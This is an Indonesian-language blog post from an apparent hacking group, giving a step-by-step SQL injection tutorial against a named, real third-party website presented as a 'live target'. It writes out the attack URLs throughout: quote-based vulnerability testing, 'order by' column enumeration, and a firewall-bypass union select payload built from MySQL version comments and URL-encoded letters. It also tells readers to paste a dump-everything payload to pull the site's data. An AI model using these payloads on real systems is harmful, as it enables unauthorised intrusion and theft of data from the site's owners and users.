Assalamualaikum
Balik lagi sama gua Noub93 Gans:v Kali ini seperti biasa mengtutor:v SQL STRUCTURED QUERY LOVE CHALL
Bahan"
->Dios
->Bypas wap
AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/
Chall/live target : http://www.icdcprague.org/index.php?id=-40
Lanjut ae ke tutor nya
Pertama" kalian tempel ae chall/live target tadi di google atau crome:v
Nah muncul tampilan awal seperti itu
Oke sekarang kita cek vuln atau tidak,dengan cara tambahin ' sesudah param/id
Contoh : http://www.icdcprague.org/index.php?id=40'
Maka akan seperti ini
Nah itu Vuln....
Lanjut klean tambahin order by nya
http://www.icdcprague.org/index.php?id=40'+order+by+1--+-
Maka muncul seperti ini
Oke kembali ke halaman semula
Kalian naikin aja angka nya sampe nemu yg error
order+by+1--+-
order+by+2--+-
order+by+3--+-
Oke percepat gua nemu yg eror di angka 7
Nah,otomatis angka togel nya ada di angka 6
Cara mencari angka togel nya kita ganti
Order+by menjadi union+select
Karna web ini harus pake bypas wap jadi kita gunain bypas wap
AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/
Nah maka akan menjadi seperti ini
Nah muncul angka togel nya kalian tinggal tempel aja dios di angka togel nya
Dan boom jadi hasil nya
Oke sekian dan jika ada kesalahan mohon maaf:)
Wassalamu'alaikum
ThanksTo : Dark_193N,Akhsan,Badboy, Killermoon
#Nexus Cyber Team
Tidak ada komentar:
Posting Komentar